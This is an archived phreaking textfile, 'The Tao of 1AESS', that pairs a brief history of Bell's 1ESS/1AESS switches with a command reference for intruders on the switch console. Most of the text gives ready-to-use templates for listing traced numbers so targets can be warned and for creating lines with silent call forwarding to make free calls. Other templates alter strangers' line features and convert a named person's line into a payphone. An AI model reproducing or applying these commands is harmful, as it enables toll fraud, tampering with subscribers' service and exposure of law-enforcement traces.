💾 Archived View for spam.works › mirrors › textfiles › phreak › 1aess.tao captured on 2023-11-14 at 11:13:47.
⬅️ Previous capture (2023-06-16)
-=-=-=-=-=-=-
-=- -= The Tao of 1AESS =- -=-=-=-=-=-=-=-= -= DeadKat&Disorder =- -=- Special thanks to Gatsby and Mark Tabas Introduction -=-=-=-=-=-= The Bell System's first trial of electronic swithcing took place in Morris, Illinois, in 1960. The Morris trial culminated a 6-year development and proved the viability of the stored-program control concept. The first application of electronic local switching in the Bell System occurred in May 1965 with the cutover of the first 1ESS switch in Succasunna, New Jersey. The 1ESS swithcing system was designed for use in areas where large numbers of lines and lines with heavy traffic (primarily business customers) are served. The system has generally been used in areas serving between 10,000 and 65,000 lines and has been the primary replacement system for urban step-by-step and panel systems. The ease and flexibility of adding new services made 1ESS switching equipment a natural replacement vehicle in city applications where the demand for new, sophisticated business and residence services is high. In 1976, the first electronic toll switching system to operate a digital time-division switching network under stored-program control, the 4ESS system, was placed in service. It used a new control, the 1A processor, for the first time to gain a call carrying capacity in excess of 550,000 busy-hour calls. The 1A processor was also designed for local switching application. It doubled the call-carrying capacity of the 1ESS switching system and was introduced in 1976 in the first 1AESS switch. The network capacity of 1ESS switching equipment was also doubled to allow the 1AESS switch to serve 130,000 lines. In addition to local telephone service, the 1AESS switches offer a variety of special services. Custom Local Area Switching Services (CLASS) are available as well Custom Calling Services. Business customers may select offerings such as centrex, ESS-ACS, Enhanced Private Switched Communications Service, or electronic tandem switching. Although more modern switches like 5ESS and DMS 200 have been developed, it is estimated that some 50 percenct of all switches are still 1AESS. Commands -=-=-=-= The 1AESS uses a command line interface for all commands. The commands are divided into three fields: action, identification, and data. The fields are always seperated by a colon. Every command is terminated by either a period for verification commands or a 'ballbat' (!) for change commands. The control-d is used to execute the command instead of a return. The underscore is used as a backspace. Commands are always type in 'all caps'. The action field is the first field of the command and is ended by a colon. The identification field is ended by the second colon. The identification field has one or two subfields which are seperated by a semicolon. Semicolons are not used elsewhere in the command. The data field consists of keyword units and is the remaining portion of the command. Basic Machine Commands -=-=-=-=-=-=-=-=-=-=-= These commands provide useful information from the system. The WHO-RV- command will tell you what CO it is and what version of the OS is installed. If your ouput is scrolling off the screen press space to end scrolling. The V-STOP- command will clear the buffer. WHO-RV-. System information. SPACE Stops ouput from scrolling. V-STOP-. Free buffer of remaining LENS/INFO. Channel Commands -=-=-=-=-=-=-=-= Channel commands are used to redirect input and output. If a switch won't respond to a command use the OP:CHAN command to check on current channel. If your channel is not responding, use the MON:CHAN command to switch output and control to your terminal (the remote). RC commands cannot be performed without the ALW command. You can check the status of the RC with the RCCENSUS command. OP:CHAN:MON! Shows all channels which are being monitored. MON:CHAN SC1;CHAN LOC! Redirect output to remote screen. STOP: MON;CHAN SC1;CHAN LOC! Redirect output to local screen. (This command needs to be done after you are finished) OP:RCCENSUS! To see recent change status. Tracing Commands -=-=-=-=-=-=-=-= CI-LIST- will give you a list of all numbers which are being traced externally. It will not show you lines which are being traced only at this switch. CI-LIST-. Traced line list. Check Features on Line -=-=-=-=-=-=-=-=-=-=-= The VF command is used to check the current settings on a line. The DN XXXXXXX specifies the phone number of the line you wish to check. Replace XXXXXXX with the seven digit phone number of the line you are checking. VF:DNSVY:FEATRS,DN XXXXXXX,1,PIC! Check features of a line. VF:DNSVY:DN XXXXXXX,1,LASFTRS! Display last Features Call Features CWT- Call Waiting CFB- Call Forward Busy - Busy=VM CFV- Call Forwarding Variable CFD- Call Forward Don't answer TWC- Three Way Calling TTC- Touch Tone RCY- Ring Cycle SC1- Speed Calling 1 SC2- Speed Calling 2 UNA- No Long Distance PXX- Block all LD service (guess) MWI- Message Waiting Indicator CHD- centrix(unremarkable) CPU- centrix(unremarkable) CLI- Calling Line Identification (CID) ACB- Automatic Call Back Feature (?) BLN- Special Toll Billing MDN NSQ FRE- Free Calling SEQ The standard output of a command appears below. The 'DN 348 2141' specifies the number you are checking. The calling features will be listed on the second line by their three letter acronyms. This line has call waiting (CWT), a trace (TRC), and touch tone dialing (TTC). M 53 TR75 2 DN 348 2141 00000003 CWT TRC TTC Searching For Free Lines -=-=-=-=-=-=-=-=-=-=-=-= The VFY command can be used to check if a line is in use. The output will list the LEN (Line Equipment Number) for the line and its call features in octal. If the LEN is all zeros, then that number has not been assigned. Replace XXXXXXX with the number you wish to check. You must prefix the phone number with 30. You can also check for unused LEN's using the VFY command. Use the space bar to stop scrolling and the V-STOP command to cancle when looking up free LEN's. VFY-DN-30XXXXXXX. Search for free lines. VFY-LEN-4100000000. List all free LENs. VFY-TNN-XXXXXXXX. To get information on trunk. The output for the VFY-DN command will appear like the one below. Notice that this number has been assigned a LEN so it is in use. M 06 TR01 796 9146 0 0 0 0 LEN 01 025 000 001 000 000 000 000 000 4 000 000 000 000 000 000 000 000 0 0 0 0 0 0 0 0 0 Searching for a Paticular Feature on a Line (trace) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- All line information is stored in the switch for its coverage area. The switch is like a huge database in this sense. You can do global searches on the switch for any feature. One especially interesting feature to search for are traced numbers. Traced numbers listed this way are INTERNALLY traced as opposed to globally traced numbers shown with the CI-LIST- command. Global and internal trace lists are always very different. And remember, be a good samaritan and call the person being traced and let them know! ;-) VF:DNSVY:FEATRS,EXMATCH TRACE! Pull all numbers IN switch area with trace on it (takes a sec). You can exmatch for any LASS feature by replacing the keyword TRACE with any call feature like call forwarding (CFB) and speed calling (SC1). To See What Numbers Are on a Speed Calling List -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Another nice use for the VFY command is to see what is on a line's speed calling list. Replace XXXXXXX with the target phone number. One devious use is to look at the CO's speed call list to find other internal telco numbers. VFY-LIST-09XXXXXXX020000 09=mask 02=single list (one digit speed calling) 20=double list (two digit speed calling) 28= " " 36= " " 44= " " To Build a Line -=-=-=-=-=-=-=- The recent change command (RC) is used to create and modify lines. Because RC commands are usually very long and complex, they are typed on multiple lines to simplify them. Each subfield of the data section of the command is typed on a seperate line ended by a slash (\) followed by pressing ctrl-d. To create a line, you specify LINE in the identification field. Before a line can be created, you must first locate an unused number by using the VFY-DN command explained above. Once a free number has been found, you use the VFY-LEN to find an available LEN. To build a new line, follow these steps: First, find spare LEN (VFY-LEN-4100000000.). Next find free line. Now type in the RC commands using the following commands as a template: RC:LINE:\ (create a line) ORD 1\ (execute the command immediately) TN XXXXXXX\ (telephone number) LEN XXXXXXXX\ (len found from above) LCC 1FR\ (line class code 1fr) CFV\ (call forward) XXX 288\ (type XXX, space, then the three digit PIC) ld carrier - 222 - MCI 288 - AT&T 333 - Sprint, etc.) ! (BEWM, don't forget the ctrl-d!!) (Look for RCXX blah blah ACPT blah - This means the RECENT CHANGE has taken affect) Creating Call Forwarding Numbers -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= The call forwarding feature is the most important feature for hackers. By creating a line or modifying an existing line with call forwarding, you can than use it to make free phone calls. You set the line to call forward/ no ring and then give it the call forwarded number. This will allow you to call the modified line and be instantly forwarded to your pre-chosen destination. First create a line using RC:LINE:, then modify the line using the following commands as a template. RC:CFV:\ (add call forwarding to a line) ORD 1\ (execute the command immediately) BASE XXXXXXX\ (base number you are changing) TO XXXXXXX\ (local - XXXXXXX : ld - XXXXXXXXXX ) PFX\ (set prefix to 1 if ld) ! (BEWM) To Change Call Forward Number -=-=-=-=-=-=-=-=-=-=-=-=-=-=- It is safer to modify an existing call forward than to create a new line soley for this purpose. You can use the VFY command and EXMATCH for CFB to find lines with call forwarding. Before you can change the call forwarding 'TO' number you must delete the old one. Remove call forward number using CFV:OUT with the template below. RC:CFV;OUT:\ (remove call forward number) ORD 1\ (execute command immediately) BASE XXXXXXX\ (number to remove it from) ! (Yeeee-Hahhhahah) Make Call Forward Not Ring -=-=-=-=-=-=-=-=-=-=-=-=-= The only drawback to call forwarding off someone's line is if rings they might answer. To get around this, you add the call-forward no-ring option (ICFRR) using the following as a template. RC:LINE;CHG:\ (recent change line to be specified) ORD 1\ (execute command immediately) TN XXXXXXX\ (number you wanna fuck with) ICFRR\ (this takes the ring off) ! (Go!) Adding a feature to a line -=-=-=-=-=-=-=-=-=-=-=-=-= The RC:LINE;CHG: can also be used to add any other call feature. Use the same template but change the feature. RC:LINE;CHG:\ (this is used for changing features) ORD 1\ (order number) TN XXXXXXX (telephone number you are fucking with) TWC\ (replace this with any feature you wish) ! (Fire!) Removing a Feature -=-=-=-=-=-=-=-=-= Use the NO delimiter to remove a feature from a line. RC:LINE;CHG:\ (change a feature) ORD 1\ (effective immediately) TN XXXXXXX\ (telephone number) CFV NO\ (feature followed by NO) ! Change Phone number into payphone -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- You've read about in the Hacker Crackdown, now you too can be 31337 and change Gail Thackery's phone into a payphone. In fact you can change the line class code (LCC) to anything you want. To display the LCC of a line use the following and replace the XXXXXXX with the line you wish to view. VF:DNSVY:LCC,DN XXXXXXX,1,PIC! (display line class code) DTF = Payphone 1FR = Flat Rate 1MR = Measured Rate 1PC = One Pay Phone CDF = DTF Coin PBX = Private Branch Exchange CFD = Coinless(ANI7) Charge-a-call INW = InWATS (800!@#) OWT = OutWATS PBM = O HO/MO MSG REG (NO ANI) PMB = LTG = 1 HO/MO (Regular ANI6) (ani6 and ani7 - only good for DMS) To change the line into a payphone use the RC:LINE;CHG command and modify the LCC like the example below. RC:LINE;CHG;\ (this is used for changing features) ORD 1\ (order number) TN XXXXXXX\ (telephone number you are fucking with) LCC DTF\ (line class code you are changing to) ! (Make it so.)